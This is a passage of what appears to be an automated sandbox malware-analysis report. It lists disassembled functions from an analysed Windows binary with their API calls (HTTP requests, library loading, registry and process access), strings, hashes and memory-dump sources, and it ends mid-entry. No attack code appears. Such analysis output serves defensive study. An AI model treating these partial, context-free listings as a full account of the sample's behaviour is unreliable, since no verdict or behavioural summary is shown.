                                                        • Opcode ID: 8fa4216a35edd9975c511724f5c2fa7955a9115b58883407f6d08b04cf822985
                                                        • Instruction ID: 17172cee820411ded23c28d871d67db22a72b0076abec31307d1c87efcaf60bc
                                                        • Opcode Fuzzy Hash: 8fa4216a35edd9975c511724f5c2fa7955a9115b58883407f6d08b04cf822985
                                                        • Instruction Fuzzy Hash: FE519E71900705DFDB28CFA5C981BEAB7F4AF48304F20856FE54ADB241E771AA84CB50
                                                        Function 0011D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0011D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0011D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0011D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0011D69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: b0aea36a5a1b6ad669fe59b53fc444db9cc662ebde8e8d4cdb1b043ab93301d5
                                                        • Instruction ID: 4dfdfc5fe54ee0bd2ad7442dc47c6b9657062a0f86f580624ccc3d7cf0a4ded2
                                                        • Opcode Fuzzy Hash: b0aea36a5a1b6ad669fe59b53fc444db9cc662ebde8e8d4cdb1b043ab93301d5
                                                        • Instruction Fuzzy Hash: E3418EB2600204EFDB09CF64D884ADA7BB9EF45314F1581BDEC099F209E7B1D984CBA0
                                                        Function 00122753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 001227C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001227DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00122822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00185890,00000000), ref: 0012286B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 9622a866e6b52b44740766589ac473a8558e1b821635c21b23edcad8bd47a61f
                                                        • Instruction ID: 41c51e91c9c69babe10be505d14fc97404fcad5ef7fc83940c8e066fa270c73e
                                                        • Opcode Fuzzy Hash: 9622a866e6b52b44740766589ac473a8558e1b821635c21b23edcad8bd47a61f
                                                        • Instruction Fuzzy Hash: 5741CE70204351AFD720DF24E844B6EBBE8EF85310F044A2DF8A697392D770E825CB52
                                                        Function 0013D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0013D7C5
                                                          • Part of subcall function 000C784B: _memmove.LIBCMT ref: 000C7899
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        • Opcode ID: 242137b599fdd785f21edd59583078ae2c37f7b39cd6bd128d853ac3278de1fe
                                                        • Instruction ID: 5ccf51216c2a92de05fb83dbb2ea14e1026b9098a94e21c92c29d5de6f5d29d1
                                                        • Opcode Fuzzy Hash: 242137b599fdd785f21edd59583078ae2c37f7b39cd6bd128d853ac3278de1fe
                                                        • Instruction Fuzzy Hash: FC318D71904619AFCF00EF64DC519EEB3B5FF14320F1086A9E869A76D2DB71A945CB80
                                                        Function 00118E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00118F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00118F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00118F57
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: 4372df08bdb7de044608ac1108581f1b90b5707812030c944f2419f566b8b094
                                                        • Instruction ID: 1de5b2f5f311a4baf4689ff605c21bdc9b5653ce7047ce243b25a311c07e8baa
                                                        • Opcode Fuzzy Hash: 4372df08bdb7de044608ac1108581f1b90b5707812030c944f2419f566b8b094
                                                        • Instruction Fuzzy Hash: 0E210475A05105BEDB18ABB4CC85DFFB779DF06360F04852DF425A72E1DF35188A9A10
                                                        Function 0013182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013184C
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00131872
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001318A2
                                                        • InternetCloseHandle.WININET(00000000), ref: 001318E9
                                                          • Part of subcall function 00132483: GetLastError.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 00132498
                                                          • Part of subcall function 00132483: SetEvent.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 001324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 6d49aea3d06163421e6fbe9dddf25aeee40a1360b673aead85b6e4fb252f82e4
                                                        • Instruction ID: 6421f03e43a831e75ae39fbbd89c273050d29e0996e17d3023f03c0c14001902
                                                        • Opcode Fuzzy Hash: 6d49aea3d06163421e6fbe9dddf25aeee40a1360b673aead85b6e4fb252f82e4
                                                        • Instruction Fuzzy Hash: E921CDB1500308BFEB11AF64CC85EBF7BEDEB89749F10416AF805A2240EB348D0597B4
                                                        Function 001463E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000C1D73
                                                          • Part of subcall function 000C1D35: GetStockObject.GDI32(00000011), ref: 000C1D87
                                                          • Part of subcall function 000C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C1D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00146461
                                                        • LoadLibraryW.KERNEL32(?), ref: 00146468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0014647D
                                                        • DestroyWindow.USER32(?), ref: 00146485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: fb3ad98e5a751b5a32c8074c6c6cbd871b9267572f2463b4306d4f0f2fb41917
                                                        • Instruction ID: a247a1d69271081ccf522f6030fe241a5df02048b300c53350740c318754f188
                                                        • Opcode Fuzzy Hash: fb3ad98e5a751b5a32c8074c6c6cbd871b9267572f2463b4306d4f0f2fb41917
                                                        • Instruction Fuzzy Hash: E8219D75200205BFEF104FA4DC90EBB37ADEB5A368F148629FA54931B0D731DC919762
                                                        Function 00126D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00126DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00126DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00126E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00126E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 2d1929d5e2d4b3f5b390ced1f489003eba701ebc57b802b18ab03f3f6c9fc6ef
                                                        • Instruction ID: e8ac24d55374668e7fcc1a192b4ddb3f5e599045b8dd101aed3eca1c4f7479d6
                                                        • Opcode Fuzzy Hash: 2d1929d5e2d4b3f5b390ced1f489003eba701ebc57b802b18ab03f3f6c9fc6ef
                                                        • Instruction Fuzzy Hash: 3821927560022DAFDB20AF69EC04A9A77F4EF55720F204A19FCE1D72E0D77099618B50
                                                        Function 00126E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00126E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00126EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00126ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00126F06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 4eeecc1508bc3c0b3af67aa586a934890a31e1362936f6d68c881f918a3604b1
                                                        • Instruction ID: 0927de62a5d6108722bb112836b74a3d6beb5f08d06ce2a99cf1ea922d60d8c9
                                                        • Opcode Fuzzy Hash: 4eeecc1508bc3c0b3af67aa586a934890a31e1362936f6d68c881f918a3604b1
                                                        • Instruction Fuzzy Hash: DC2180796003259BDB20EF69EC04AAA77E8EF55730F210A19FCA1D72D0DB70E961CB50
                                                        Function 0012AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012AC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0012ACA8
                                                        • __swprintf.LIBCMT ref: 0012ACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0014F910), ref: 0012ACFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: cb7bd08e5938c779afad509275d12df3e5f0d63729a0aff4e3cb20ae019c0764
                                                        • Instruction ID: 2b422021a7c56bbadb33f0e5c32456218b05526f226eb0b8cc02817eb99a4855
                                                        • Opcode Fuzzy Hash: cb7bd08e5938c779afad509275d12df3e5f0d63729a0aff4e3cb20ae019c0764
                                                        • Instruction Fuzzy Hash: C6217134A00109AFCB10DF65D945EEE7BB8EF89714B0040A9F909EB362DB71EA55CB61
                                                        Function 00121AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00121B19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: 68d065f7b25a7b06d70a32af2e7ea8b3961a351015d97e683a7f4aaf8f743bc8
                                                        • Instruction ID: a1b3857ec3d099241ec47996e2a609fe456cee125cc361b9fb2d7ca086e53e79
                                                        • Opcode Fuzzy Hash: 68d065f7b25a7b06d70a32af2e7ea8b3961a351015d97e683a7f4aaf8f743bc8
                                                        • Instruction Fuzzy Hash: F311AD309402989FCF00EFA4E8518FEB3B4FF26304B1488A8D818A7692EB325D46CB50
                                                        Function 0013EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0013EC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0013EC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0013ED6A
                                                        • CloseHandle.KERNEL32(?), ref: 0013EDEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 639ffa24f8428f7931bb154f67cfcacb51e34587bb41fb747ca39c5a2f4f2e3f
                                                        • Instruction ID: 03644242cd0852eb33057f5e73f14ab3b14402e9246fd384e9f68b08bc1fc9b5
                                                        • Opcode Fuzzy Hash: 639ffa24f8428f7931bb154f67cfcacb51e34587bb41fb747ca39c5a2f4f2e3f
                                                        • Instruction Fuzzy Hash: EE815F71604300AFD760EF28C886F6EB7E5AF84710F14881DF99A9B2D2DB71AC45CB55
                                                        Function 000E541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction ID: d118c3f56e4539e7e7a28b36c205bd8d6d57b2c06e507e8b1a959b179b72363b
                                                        • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction Fuzzy Hash: B2519371A00F85DFDB648E6ADC506AE77F6AF4032AF248B29F835B62D1D7709D508B40
                                                        Function 00140037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001400FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00140183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 001401AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 001401BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: f1fe781a987aa2ebdb9dd37a6d1bd42215082d3dea15285b3bbec2d990fabe66
                                                        • Instruction ID: b796975f2628220b782d2b2574e2202a19df4e0b1f1c2af4f39ba1fd6f1dbc5a
                                                        • Opcode Fuzzy Hash: f1fe781a987aa2ebdb9dd37a6d1bd42215082d3dea15285b3bbec2d990fabe66
                                                        • Instruction Fuzzy Hash: A8514771208204AFD715EF68C881FAEB7E9FF88714F40492DF5958B2A2DB31E945CB52
                                                        Function 0013D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0013D927
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0013D9AA
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0013D9C6
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0013DA07
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0013DA21
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00127896,?,?,00000000), ref: 000C5A2C
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00127896,?,?,00000000,?,?), ref: 000C5A50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 459705c2a45c2f6fecb8e009d42239421a144352d917e55bd2a2d749605d50ba
                                                        • Instruction ID: 20f14709894eb624b6cdf3afdfcdddfe1d4584627a7d72acc4bc83d972425bc4
                                                        • Opcode Fuzzy Hash: 459705c2a45c2f6fecb8e009d42239421a144352d917e55bd2a2d749605d50ba
                                                        • Instruction Fuzzy Hash: DC51F635A00205DFCB04EFA8E484EADB7F5FF09324F158069E855AB322DB31AD45CB51
                                                        Function 0012E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0012E61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0012E648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0012E687
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0012E6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0012E6B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
